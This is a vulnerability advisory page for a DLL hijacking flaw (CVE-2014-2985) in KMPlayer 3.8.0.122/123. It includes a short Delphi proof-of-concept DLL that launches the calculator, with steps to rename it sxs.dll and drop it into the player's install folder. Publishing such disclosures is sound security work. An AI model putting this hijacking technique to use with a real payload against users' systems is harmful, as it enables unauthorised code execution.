Kmplayer 3.8.0.122 / 3.8.0.123 DLL Hijacking

2014.04.29

Credit: Aryan Bayaninejad

Risk: Low

Local: Yes

Remote: No

CVE: CVE-2014-2985

CWE: N/A

# Kmplayer 3.8.0.122 / 3.8.0.123 DLL Hijacking
#
###########################
#
# Exploit Title: [KmPlayer 3.8.0.123 DLL Hijacking ]
# Date: [2014/04/22]
# Exploit Author: [Aryan Bayaninejad]
# Linkedin : https://www.linkedin.com/profile/view?id=276969082
# Vendor Homepage: [http://www.kmplayer.com/]
# Software Link: [
http://www.softpedia.com/progDownload/KMPlayer-Download-26726.html]
# Version: [Version 3.8.0.122 and 3.8.0.123 ]
# Tested on: [Windows Xp Sp3 - 32bit & Windows 7 - 32bit & 64bit]
# CVE : [CVE-2014-2985]
#
###########################
details:
Untrusted search path vulnerability in Kmplayer latest version [3.8.0.123]
when running on Windows 7, and XP, allows local
users and possibly remote attackers to gain privileges via a Trojan horse
DLL in the current working directory by sxs.dll .
uses
Windows;
begin
Winexec(PAnsichar('C:\WINDOWS\system32\calc.exe'),sw_show);
end.
Compile Above Source Code With Delphi And Rename Compiled DLL To sxs.dll
Then Copy It To The KMPlayer Installed Path, Now If You Run The KMPlayer
DLL Will Hijacked!

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Kmplayer 3.8.0.122 / 3.8.0.123 DLL Hijacking

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.